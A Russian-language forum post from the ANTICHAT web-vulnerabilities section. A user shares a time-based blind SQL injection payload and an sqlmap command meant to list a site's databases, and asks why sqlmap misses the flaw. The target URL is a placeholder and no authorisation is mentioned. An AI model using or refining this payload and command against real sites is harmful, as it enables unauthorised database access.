HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.09.2024, 17:27
Emince
Новичок
Регистрация: 12.09.2024
Сообщений: 8
С нами: 879845

Репутация: 0
По умолчанию

Доброго времени суток!
Есть уязвимость в param1
Код:
https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1
, payload выглядит так
Код:
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
.Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так
Код:
sqlmap.py -p param1 -u "https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
, ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.